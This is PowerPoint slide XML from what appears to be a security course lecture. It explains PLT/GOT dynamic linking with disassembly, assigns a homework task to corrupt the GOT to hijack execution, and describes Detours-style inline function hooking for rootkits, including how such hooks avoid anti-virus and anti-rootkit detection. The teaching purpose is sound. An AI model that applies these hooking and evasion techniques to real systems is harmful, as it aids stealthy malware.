              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t># PLT[2]: call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1200" i="1" dirty="0">
              <a:latin typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005c0: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*GOT[4]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005c6: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>pushq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>0x1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>4005cb: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>jmpq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>  4005a0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="0" 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  <a:p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/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Box 119"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2998177"/>
            <a:ext cx="25485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1400" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:rPr>
              <a:t>Procedure linkage table (PLT)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3" name="Group 94"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="187569" y="2743200"/>
            <a:ext cx="682870" cy="1608992"/>
            <a:chOff x="187569" y="2743200"/>
            <a:chExt cx="682870" cy="1608992"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="32" name="Straight Connector 31"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="492369" y="2751992"/>
              <a:ext cx="37807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492369" y="2743200"/>
              <a:ext cx="0" cy="16002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92369" y="4352192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Oval 42"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="187569" y="28194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" name="Group 95"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="195592" y="4413738"/>
            <a:ext cx="551754" cy="219104"/>
            <a:chOff x="195592" y="4413738"/>
            <a:chExt cx="551754" cy="219104"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="37" name="Straight Connector 36"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="492369" y="4413738"/>
              <a:ext cx="23452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492369" y="4536831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492369" y="4413738"/>
              <a:ext cx="0" cy="123092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Oval 43"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="195592" y="4413738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5" name="Group 96"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="111369" y="3276600"/>
            <a:ext cx="635977" cy="1444869"/>
            <a:chOff x="111369" y="3276600"/>
            <a:chExt cx="635977" cy="1444869"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="Straight Connector 39"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="111369" y="4721469"/>
              <a:ext cx="615521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40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="111369" y="3552092"/>
              <a:ext cx="0" cy="1169377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Arrow Connector 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="111369" y="3552092"/>
              <a:ext cx="635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Oval 44"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="111369" y="32766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3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6" name="Group 97"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3159369" y="3505200"/>
            <a:ext cx="901874" cy="304801"/>
            <a:chOff x="3159369" y="3505200"/>
            <a:chExt cx="901874" cy="304801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="Oval 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3540369" y="35052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/>
                <a:t>4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76" name="Straight Arrow Connector 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3159369" y="3810000"/>
              <a:ext cx="901874" cy="1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2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5410200" y="228600"/>
            <a:ext cx="3261946" cy="1846385"/>
            <a:chOff x="685800" y="228600"/>
            <a:chExt cx="3261946" cy="1846385"/>
          </a:xfrm>
        </p:grpSpPr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685800" y="228600"/>
              <a:ext cx="3261946" cy="184638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algn="ctr"/>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New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788435" y="788333"/>
              <a:ext cx="3097765" cy="122510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GOT[0]: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.dynamic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GOT[1]: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addr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of </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1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reloc</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1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 entries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GOT[2]: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> of dynamic linker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GOT[3]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1200" b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0x4005b6  </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1100" b="0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# sys startup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GOT[4]: </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="11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&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1100" b="1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printf</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="11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urier New"/>
                </a:rPr>
                <a:t>()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Courier New"/>
                </a:rPr>
                <a:t>GOT[5]: 0x4005d6  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1100" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># exit()</a:t>
              </a:r>
              <a:endPara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66" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="719276" y="536331"/>
              <a:ext cx="218034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Global offset table (GOT)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67" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="685800" y="228600"/>
              <a:ext cx="129875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Data segment</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 98"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5375030" y="2209800"/>
            <a:ext cx="3464170" cy="2831123"/>
            <a:chOff x="5375030" y="2209800"/>
            <a:chExt cx="3464170" cy="2831123"/>
          </a:xfrm>
        </p:grpSpPr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375030" y="2209800"/>
              <a:ext cx="3464170" cy="283112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t" anchorCtr="0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endParaRPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="sk-SK" sz="1400" dirty="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="sk-SK" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>callq 0x4005c0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>   </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t># call </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="sk-SK" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                  <a:cs typeface="Courier New"/>
                </a:rPr>
                <a:t>() </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5375031" y="2209800"/>
              <a:ext cx="1348446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i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Code segment</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:latin typeface="Helvetica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5444189" y="3256085"/>
              <a:ext cx="3069696" cy="172329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200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># PLT[0]: call dynamic linker </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005a0: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>pushq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> *GOT[1]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005a6: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*GOT[2]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>…</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t># PLT[2]: call </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>printf</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1200" i="1" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>()</a:t>
              </a:r>
              <a:endParaRPr lang="cs-CZ" sz="1200" i="1" dirty="0">
                <a:latin typeface="Courier New"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005c0: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*GOT[4]</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005c6: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>pushq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t> $</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>0x1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>4005cb: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>jmpq</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="cs-CZ" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Courier New"/>
                </a:rPr>
                <a:t>  4005a0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endPara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  <a:p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/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="82" name="Text Box 119"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5375031" y="3009900"/>
              <a:ext cx="254858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1400" dirty="0" smtClean="0">
                  <a:latin typeface="Helvetica" charset="0"/>
                </a:rPr>
                <a:t>Procedure linkage table (PLT)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Helvetica" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 99"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4876800" y="2754923"/>
            <a:ext cx="682870" cy="1608992"/>
            <a:chOff x="4876800" y="2754923"/>
            <a:chExt cx="682870" cy="1608992"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="78" name="Straight Connector 77"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5181600" y="2763715"/>
              <a:ext cx="378070" cy="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 flipV="1">
              <a:off x="5181600" y="2754923"/>
              <a:ext cx="0" cy="160020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181600" y="4363915"/>
              <a:ext cx="254977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Oval 88"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4876800" y="2831123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1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10" name="Group 100"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7848600" y="4038600"/>
            <a:ext cx="901874" cy="316524"/>
            <a:chOff x="7848600" y="4038600"/>
            <a:chExt cx="901874" cy="316524"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="90" name="Oval 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8229600" y="4038600"/>
              <a:ext cx="220577" cy="219104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16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/>
                <a:t>2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93" name="Straight Arrow Connector 40"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7848600" y="4355123"/>
              <a:ext cx="901874" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000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2" name="TextBox 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="5715000"/>
            <a:ext cx="7370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n-lt"/>
              </a:rPr>
              <a:t>PLT homework: Corrupt GOT to hijack execution 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0400" y="3810000"/>
            <a:ext cx="9167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+mn-lt"/>
              </a:rPr>
              <a:t>To linker</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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48600" y="4343400"/>
            <a:ext cx="10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+mn-lt"/>
              </a:rPr>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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printf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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5" grpId="0" animBg="1"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="102" grpId="0"/>
      <p:bldP spid="48" grpId="0"/>
      <p:bldP spid="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Hot-patching invocation (Detours)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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Library developed by Microsoft in 1999</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>G. Hunt, D. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Brubacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, “Detours: Binary Interception of Win32 Functions”, 3rd USENIX Windows NT Symposium, July 1999.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Instrument and extend existing OS and application functionality simply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>A programmer-friendly “feature” of Windows to easily patch functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Avoids modification of function pointer tables which can be detected by anti-virus/anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> technology</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Detours modify function in-line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="2127707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Save initial instructions of function at the entry point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Original bytes of function saved in trampoline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Inject code (detour) to redirect execution to interceptor function (trampoline)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Done by inserting jump instruction into function where original bytes were</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Trampoline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Implements 5 replaced bytes of original function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Implements the function you want to execute</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>jmps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> back to original target function plus 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44419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Detour details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5-byte function preamble replaced by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>jmp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Replaced instructions moved to trampoline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Microsoft intentionally changed preamble to support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Before XP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55     push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8bec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 smtClean="0"/>
              <a:t>Hard to hook since you must disassemble user code to insert detour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>After XP</a:t>
            </a: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8bff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55     push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8bec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esp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2000" dirty="0" smtClean="0"/>
              <a:t>Easy to hook, exactly 5 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Makes hot patches easy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="332184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Detour details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Must know which OS is being used </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Must ensure no one else has patched the function already</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Must save the instructions being removed by detour</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Must ensure code reachable via a relative FAR JMP instruction target calculated at run-time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4400" y="4723696"/>
            <a:ext cx="2895840" cy="456528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latin typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>FAR JMP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08801" y="4723696"/>
            <a:ext cx="4039200" cy="456528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latin typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>Rest of original function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914401" y="5943505"/>
            <a:ext cx="2134080" cy="456527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latin typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>Rootkit code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676160" y="5181664"/>
            <a:ext cx="1440" cy="76184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7040" y="5943505"/>
            <a:ext cx="2819520" cy="456527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/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latin typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>Removed instructions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 flipV="1">
            <a:off x="3790080" y="5162943"/>
            <a:ext cx="3617280" cy="797844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866561" y="5943505"/>
            <a:ext cx="2895840" cy="456527"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="800000">
              <a:alpha val="50000"/>
            </a:srgb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>
                <a:solidFill>
                  <a:srgbClr val="000066"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="16" charset="0"/>
              </a:rPr>
              <a:t>FAR JMP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4144194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 details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powerful than IAT hooking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Do not have problems with binding time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ensures hook is not overwritten by application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>IAT (PLT in Linux) calculated upon first invocation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Functions appearing in multiple tables are handled in one step</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
